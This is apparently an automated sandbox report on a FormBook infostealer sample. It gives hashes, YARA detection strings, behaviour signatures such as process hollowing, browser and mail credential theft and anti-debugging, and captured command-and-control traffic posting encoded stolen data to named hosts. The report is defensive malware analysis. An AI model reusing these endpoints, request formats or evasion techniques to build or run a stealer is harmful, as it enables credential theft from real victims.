# Analysis Report druS9vVaUK.exe

## Overview

### General Information

- Sample Name: druS9vVaUK.exe
- MD5: e2a5e6e8c1448dfcaf7ae95dff95ade9
- SHA1: 33c1ff8589faf0c2469a33131fcdffb01547dab0
- SHA256: 8e0003e4f6d537153e60ac5129859a33b57b3b9a36b7d2be62273a6b3a8d5f3f

### Detection

FormBook

- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%

### Signatures

- Benign windows process drops PE files
- Detected FormBook malware
- Detected unpacking (changes PE section rights)
- Detected unpacking (overwrites its own PE header)
- Malicious sample detected (through community Yara rule)
- Multi AV Scanner detection for domain / URL
- Multi AV Scanner detection for dropped file
- Multi AV Scanner detection for submitted file
- System process connects to network (likely due to code injection or exploit)
- Yara detected FormBook
- Injects a PE file into a foreign processes
- Machine Learning detection for dropped file
- Machine Learning detection for sample
- Maps a DLL or memory area into another process
- Modifies the prolog of user mode functions (user mode inline hooks)
- Queues an APC in another process (thread injection)
- Sample uses process hollowing technique
- Tries to detect virtualization through RDTSC time measurements
- Tries to harvest and steal browser information (history, passwords, etc)
- Tries to steal Mail credentials (via file access)
- Uses netstat to query active network connections and open ports
- Abnormal high CPU Usage
- Antivirus or Machine Learning detection for unpacked file
- Checks if the current process is being debugged
- Contains functionality for execution timing, often used to detect debuggers
- Contains functionality to call native functions
- Contains functionality to read the PEB
- Contains long sleeps (>= 3 min)
- Creates a DirectInput object (often for capturing keystrokes)
- Creates a process in suspended mode (likely to inject code)
- Detected potential crypto function
- Drops PE files
- Enables debug privileges
- Found inlined nop instructions (likely shell or obfuscated code)
- Found large amount of non-executed APIs
- Found potential string decryption / allocating functions
- HTTP GET or POST without a user agent
- IP address seen in connection with other malware
- Internet Provider seen in connection with other malware
- May sleep (evasive loops) to hinder dynamic analysis
- PE file contains strange resources
- Queries the volume information (name, serial number etc) of a device
- Sample file is different than original file name gathered from version info
- Searches the installation path of Mozilla Firefox
- Uses a known web browser user agent for HTTP communication
- Uses code obfuscation techniques (call, push, ret)
- Yara signature match

### Classification

System is w10x64

- druS9vVaUK.exe (PID: 1320, cmdline: 'C:\Users\user\Desktop\druS9vVaUK.exe', MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)
- druS9vVaUK.exe (PID: 3876, cmdline: {path}, MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)
- explorer.exe (PID: 3024, MD5: E4A81EDDFF8B844D85C8B45354E4144E)
- NETSTAT.EXE (PID: 4988, cmdline: C:\Windows\SysWOW64\NETSTAT.EXE, MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
- cmd.exe (PID: 476, cmdline: /c del 'C:\Users\user\Desktop\druS9vVaUK.exe', MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 3604, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- axh0nv7nt03do.exe (PID: 1200, cmdline: 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe', MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)

## Malware Configuration

No configs have been found

## Yara Overview

### Memory Dumps

- Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp
  - Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  - Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    - 0x157b9:$sqlite3step: 68 34 1C 7B E1
    - 0x158cc:$sqlite3step: 68 34 1C 7B E1
    - 0x157e8:$sqlite3text: 68 38 2A 90 C5
    - 0x1590d:$sqlite3text: 68 38 2A 90 C5
    - 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
    - 0x15923:$sqlite3blob: 68 53 D8 7F 8C
  - Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    - 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    - 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    - 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    - 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    - 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    - 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    - 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    - 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    - 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp
  - Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  - Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    - 0x157b9:$sqlite3step: 68 34 1C 7B E1
    - 0x158cc:$sqlite3step: 68 34 1C 7B E1
    - 0x157e8:$sqlite3text: 68 38 2A 90 C5
    - 0x1590d:$sqlite3text: 68 38 2A 90 C5
    - 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
    - 0x15923:$sqlite3blob: 68 53 D8 7F 8C

### Unpacked PEs

- Source: 2.2.druS9vVaUK.exe.400000.0.unpack
  - Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  - Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    - 0x149b9:$sqlite3step: 68 34 1C 7B E1
    - 0x14acc:$sqlite3step: 68 34 1C 7B E1
    - 0x149e8:$sqlite3text: 68 38 2A 90 C5
    - 0x14b0d:$sqlite3text: 68 38 2A 90 C5
    - 0x149fb:$sqlite3blob: 68 53 D8 7F 8C
    - 0x14b23:$sqlite3blob: 68 53 D8 7F 8C
  - Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    - 0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x11d35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    - 0x11821:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    - 0x11e37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    - 0x11faf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    - 0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    - 0x10a9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    - 0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    - 0x170a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    - 0x180aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack
  - Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  - Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    - 0x157b9:$sqlite3step: 68 34 1C 7B E1
    - 0x158cc:$sqlite3step: 68 34 1C 7B E1
    - 0x157e8:$sqlite3text: 68 38 2A 90 C5
    - 0x1590d:$sqlite3text: 68 38 2A 90 C5
    - 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
    - 0x15923:$sqlite3blob: 68 53 D8 7F 8C

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

- Multi AV Scanner detection for domain / URL
  - Source: www.flycoz.com; Virustotal: Detection: 8%
  - Source: http://www.flycoz.com/te/; Virustotal: Detection: 9%
  - Source: http://www.flycoz.com; Virustotal: Detection: 8%
- Multi AV Scanner detection for dropped file
  - Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe; Virustotal: Detection: 33%
  - Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe; ReversingLabs: Detection: 35%
- Multi AV Scanner detection for submitted file
  - Source: druS9vVaUK.exe; Virustotal: Detection: 33%
  - Source: druS9vVaUK.exe; ReversingLabs: Detection: 35%
- Yara detected FormBook
  - Source: Yara match; File source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE
  - Source: Yara match; File source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Machine Learning detection for dropped file
  - Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe; Joe Sandbox ML: detected
- Machine Learning detection for sample
  - Source: druS9vVaUK.exe; Joe Sandbox ML: detected
- Antivirus or Machine Learning detection for unpacked file
  - Source: 2.2.druS9vVaUK.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

- Found inlined nop instructions (likely shell or obfuscated code)
  - Source: C:\Users\user\Desktop\druS9vVaUK.exe; Code function: 4x nop then pop edi 2_2_00415092
  - Source: C:\Users\user\Desktop\druS9vVaUK.exe; Code function: 4x nop then pop ebx 2_2_004053FD
  - Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop ebx 5_2_032A53FD
  - Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop edi 5_2_032B5092
  - Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop edi 5_2_032B40D2

### Networking:

- Uses netstat to query active network connections and open ports
  - Source: unknown; Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
- HTTP GET or POST without a user agent
  - Source: global traffic; HTTP traffic detected (Data Raw: 00 00 00 00 00 00 00; Data Ascii: blank):

    ```
    GET /te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT&U2M=LHELWH HTTP/1.1
    Host: www.isolb.net
    Connection: close
    ```

  - Source: global traffic; HTTP traffic detected (Data Raw: 00 00 00 00 00 00 00; Data Ascii: blank):

    ```
    GET /te/?1bm41T=M2ouDOe6+0eFywnoUebsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuNOu64F6TRgF&U2M=LHELWH HTTP/1.1
    Host: www.flycoz.com
    Connection: close
    ```

- IP address seen in connection with other malware
  - Source: Joe Sandbox View; IP Address: 209.99.64.55
- Internet Provider seen in connection with other malware
  - Source: Joe Sandbox View; ASN Name: unknown
  - Source: Joe Sandbox View; ASN Name: unknown
- Uses a known web browser user agent for HTTP communication
 Source: global traffic HTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 72 6a 4d 30 67 37 6d 79 77 61 4a 56 34 33 71 32 64 36 6a 59 52 68 52 59 4a 62 36 58 53 34 45 6a 4d 69 77 6a 4b 78 53 74 70 4f 35 51 72 4d 4d 6a 46 51 47 78 63 43 73 67 49 49 72 4f 78 59 65 47 6b 39 39 38 4a 37 49 64 72 70 39 56 51 52 4a 7a 63 50 70 45 5f 49 31 57 4c 44 39 4a 6b 51 36 79 52 61 35 47 44 28 6f 37 45 73 31 57 34 4e 33 4c 30 58 39 53 73 49 74 6b 4c 69 32 4c 71 36 6e 6c 76 6f 32 7e 63 53 54 62 75 58 2d 47 58 34 76 6b 48 31 34 38 4d 39 4c 6a 4b 4f 69 67 31 28 6d 47 4f 77 49 65 30 35 6e 59 36 77 64 6f 6a 61 66 73 70 78 6f 6d 75 71 51 7a 48 55 52 4b 77 4e 46 7a 5a 34 44 57 4f 53 56 47 4a 74 35 70 4e 34 51 57 49 6e 34 4a 4d 7e 38 6f 78 44 53 36 4a 47 33 53 6d 6e 62 49 52 7a 47 51 49 36 67 59 67 73 6b 61 5a 4e 59 6f 46 72 47 74 47 41 49 4e 4c 64 61 30 6d 64 4d 4c 4f 50 58 42 48 39 6e 46 58 6d 2d 47 46 70 62 42 6f 7a 72 62 44 53 31 51 78 41 2d 70 78 42 38 52 79 52 6c 7a 41 4e 66 70 78 28 35 37 6f 4c 50 30 47 69 6f 7e 36 36 6e 6f 67 70 42 62 61 31 34 62 75 28 4e 31 34 54 70 6d 33 78 6b 62 65 51 63 61 71 48 30 34 39 64 43 38 63 35 37 59 70 36 78 6d 53 65 61 53 32 62 75 6f 30 6f 66 34 6e 54 56 4f 76 73 64 4f 55 43 48 73 6a 76 6a 6f 58 44 70 73 34 6c 35 78 41 78 59 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
1bm41T=EUkUdrjM0g7mywaJV43q2d6jYRhRYJb6XS4EjMiwjKxStpO5QrMMjFQGxcCsgIIrOxYeGk998J7Idrp9VQRJzcPpE_I1WLD9JkQ6yRa5GD(o7Es1W4N3L0X9SsItkLi2Lq6nlvo2~cSTbuX-GX4vkH148M9LjKOig1(mGOwIe05nY6wdojafspxomuqQzHURKwNFzZ4DWOSVGJt5pN4QWIn4JM~8oxDS6JG3SmnbIRzGQI6gYgskaZNYoFrGtGAINLda0mdMLOPXBH9nFXm-GFpbBozrbDS1QxA-pxB8RyRlzANfpx(57oLP0Gio~66nogpBba14bu(N14Tpm3xkbeQcaqH049dC8c57Yp6xmSeaS2buo0of4nTVOvsdOUCHsjvjoXDps4l5xAxYlg). Source: global traffic HTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 146192Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 70 43 39 31 51 28 33 6a 7a 7a 76 48 4f 57 6e 39 59 7e 74 64 53 31 43 43 71 37 75 65 6c 67 71 6a 4d 54 33 72 72 68 41 6e 71 57 35 57 70 6b 58 71 46 51 46 35 38 43 7a 32 4a 31 65 51 57 4d 47 47 6c 34 31 38 4a 7a 4a 58 4e 6c 30 56 41 52 61 7a 38 44 46 43 38 30 75 57 4a 32 66 48 6d 38 69 33 52 57 35 59 6e 54 71 69 46 38 51 54 39 39 79 56 55 37 79 42 63 67 77 6b 35 32 4f 4b 4e 6d 46 31 2d 30 34 76 64 6d 49 48 2d 6d 5a 44 45 59 61 71 7a 6c 37 35 50 42 69 6e 74 66 70 6a 30 28 75 4b 76 77 50 65 45 67 6d 55 61 42 2d 74 51 57 6d 75 35 67 52 6d 6f 50 6c 37 57 70 49 42 52 64 64 31 6f 30 70 59 66 57 58 4b 61 30 38 7e 37 45 44 46 59 33 48 52 4f 58 75 73 69 47 50 30 73 44 71 50 55 48 67 4b 46 44 4b 66 71 79 32 5a 54 41 53 41 38 46 6e 6b 6d 36 41 6c 33 67 36 49 4a 77 35 35 6d 63 71 62 2d 50 4c 56 69 70 50 41 42 65 70 47 47 68 6d 42 75 57 7a 44 79 75 6c 65 55 41 51 32 41 73 36 58 57 45 71 35 69 35 6e 74 7a 50 49 71 76 36 77 69 32 69 50 30 59 53 6f 6f 67 70 4e 62 62 31 53 55 5f 37 4e 31 74 66 32 6e 55 4a 53 50 75 51 37 4a 4b 58 32 71 4f 5a 73 38 63 68 37 62 34 4b 58 6d 68 4f 61 57 6b 7a 68 70 52 45 66 28 58 54 56 58 5f 74 6a 64 56 54 35 
73 57 62 78 71 31 6a 6d 77 49 6c 71 34 41 34 6b 79 65 6a 66 43 56 43 78 78 31 62 4e 6d 31 42 7a 52 59 30 4d 4c 55 37 45 42 61 70 65 4c 4c 57 42 67 67 63 7a 6e 4d 78 43 78 76 57 59 79 68 6c 74 41 6c 62 50 44 38 56 77 6b 6f 6e 56 51 69 37 6e 68 42 55 4d 4d 2d 33 56 53 2d 41 4e 68 64 65 53 30 53 55 79 6d 61 71 61 35 30 74 79 65 66 35 7a 46 6e 42 48 56 73 68 45 6a 57 31 51 6f 68 6c 75 7a 59 5a 59 33 71 6c 67 67 51 36 35 63 4b 79 64 4a 58 34 37 61 72 58 41 73 2d 6d 38 28 33 31 42 78 43 30 74 35 34 6a 6c 31 56 34 33 34 7a 4b 39 56 78 34 65 55 68 5a 52 6d 4d 64 61 67 6c 4b 49 47 56 6f 5f 33 64 47 4c 42 75 66 51 67 49 63 72 45 44 42 38 44 68 6e 63 4f 59 67 67 44 4c 4d 73 4f 36 78 37 5a 33 76 6e 6c 4b 56 4f 34 49 54 52 71 38 6a 74 34 30 57 68 43 69 74 41 36 6b 46 50 59 5a 4f 2d 64 32 49 36 39 6f 46 65 37 4d 77 67 46 37 4c 4d 42 74 53 4a 62 65 4f 37 45 6d 41 38 28 64 28 68 63 5f 4c 4d 6c 77 34 45 32 63 63 6c 4c 33 66 41 50 44 39 66 77 62 6c 62 56 58 31 51 4b 58 76 5a 6a 47 76 4f 7e 79 72 32 66 35 6e 48 43 5f 39 73 33 6c 71 44 39 66 6e 42 49 45 4b 78 70 36 6c 32 31 6e 50 73 48 6c 39 78 70 73 28 41 6f 6b 61 6f 66 54 6c 36 61 32 7e 30 7a 72 70 63 71 4a 50 41 42 55 33 44 4f 52 6e 73 58 39 65 6a 76 54 62 76 44 55 67 6c 45 34 6e 72 6e 31 48 72 4c 74 75 61 56 57 36 4e 77 78 66 71 47 52 28 4d 68 4e 66 57 35 78 67 6c 4a 53 72 77 7e 4e 39 78 38 35 28 6a 54 58 66 46 41 45 52 43 42 75 65 58 6e 50 35 64 51 77 6a 41 77 39 6e 36 4c 32
  - Source: global traffic; HTTP traffic detected (Data Raw: 00 00 00 00 00 00 00; Data Ascii: blank):

    ```
    GET /te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT&U2M=LHELWH HTTP/1.1
    Host: www.isolb.net
    Connection: close
    ```

  - Source: global traffic; HTTP traffic detected (Data Raw: 00 00 00 00 00 00 00; Data Ascii: blank):

    ```
    GET /te/?1bm41T=M2ouDOe6+0eFywnoUebsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuNOu64F6TRgF&U2M=LHELWH HTTP/1.1
    Host: www.flycoz.com
    Connection: close
    ```
- Performs DNS lookups
  - Source: unknown; DNS traffic detected: queries for: www.qdbfqfphjidqgtbttnq.com
- Posts data to webserver
 Source: unknown HTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 72 6a 4d 30 67 37 6d 79 77 61 4a 56 34 33 71 32 64 36 6a 59 52 68 52 59 4a 62 36 58 53 34 45 6a 4d 69 77 6a 4b 78 53 74 70 4f 35 51 72 4d 4d 6a 46 51 47 78 63 43 73 67 49 49 72 4f 78 59 65 47 6b 39 39 38 4a 37 49 64 72 70 39 56 51 52 4a 7a 63 50 70 45 5f 49 31 57 4c 44 39 4a 6b 51 36 79 52 61 35 47 44 28 6f 37 45 73 31 57 34 4e 33 4c 30 58 39 53 73 49 74 6b 4c 69 32 4c 71 36 6e 6c 76 6f 32 7e 63 53 54 62 75 58 2d 47 58 34 76 6b 48 31 34 38 4d 39 4c 6a 4b 4f 69 67 31 28 6d 47 4f 77 49 65 30 35 6e 59 36 77 64 6f 6a 61 66 73 70 78 6f 6d 75 71 51 7a 48 55 52 4b 77 4e 46 7a 5a 34 44 57 4f 53 56 47 4a 74 35 70 4e 34 51 57 49 6e 34 4a 4d 7e 38 6f 78 44 53 36 4a 47 33 53 6d 6e 62 49 52 7a 47 51 49 36 67 59 67 73 6b 61 5a 4e 59 6f 46 72 47 74 47 41 49 4e 4c 64 61 30 6d 64 4d 4c 4f 50 58 42 48 39 6e 46 58 6d 2d 47 46 70 62 42 6f 7a 72 62 44 53 31 51 78 41 2d 70 78 42 38 52 79 52 6c 7a 41 4e 66 70 78 28 35 37 6f 4c 50 30 47 69 6f 7e 36 36 6e 6f 67 70 42 62 61 31 34 62 75 28 4e 31 34 54 70 6d 33 78 6b 62 65 51 63 61 71 48 30 34 39 64 43 38 63 35 37 59 70 36 78 6d 53 65 61 53 32 62 75 6f 30 6f 66 34 6e 54 56 4f 76 73 64 4f 55 43 48 73 6a 76 6a 6f 58 44 70 73 34 6c 35 78 41 78 59 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
1bm41T=EUkUdrjM0g7mywaJV43q2d6jYRhRYJb6XS4EjMiwjKxStpO5QrMMjFQGxcCsgIIrOxYeGk998J7Idrp9VQRJzcPpE_I1WLD9JkQ6yRa5GD(o7Es1W4N3L0X9SsItkLi2Lq6nlvo2~cSTbuX-GX4vkH148M9LjKOig1(mGOwIe05nY6wdojafspxomuqQzHURKwNFzZ4DWOSVGJt5pN4QWIn4JM~8oxDS6JG3SmnbIRzGQI6gYgskaZNYoFrGtGAINLda0mdMLOPXBH9nFXm-GFpbBozrbDS1QxA-pxB8RyRlzANfpx(57oLP0Gio~66nogpBba14bu(N14Tpm3xkbeQcaqH049dC8c57Yp6xmSeaS2buo0of4nTVOvsdOUCHsjvjoXDps4l5xAxYlg).
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jun 2020 16:04:43 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 326Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: 404 Not Found

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

- Urls found in memory or binary data
- Creates a DirectInput object (often for capturing keystrokes)
  - Source: druS9vVaUK.exe, 00000000.00000002.444726602.0000000000C90000.00000004.00000020.sdmp; Binary or memory string:

### E-Banking Fraud:

- Yara detected FormBook
  - Source: Yara match; File source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match; File source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE
  - Source: Yara match; File source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 
00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Abnormal high CPU Usage Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Process Stats: CPU usage > 98%
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C800F8 0_2_00C800F8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C81C7C 0_2_00C81C7C Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C87DC0 0_2_00C87DC0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C801D6 0_2_00C801D6 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C82AD8 0_2_00C82AD8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C89A00 0_2_00C89A00 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C89218 0_2_00C89218 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C80BE0 0_2_00C80BE0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C813A0 0_2_00C813A0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84493 0_2_00C84493 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8D078 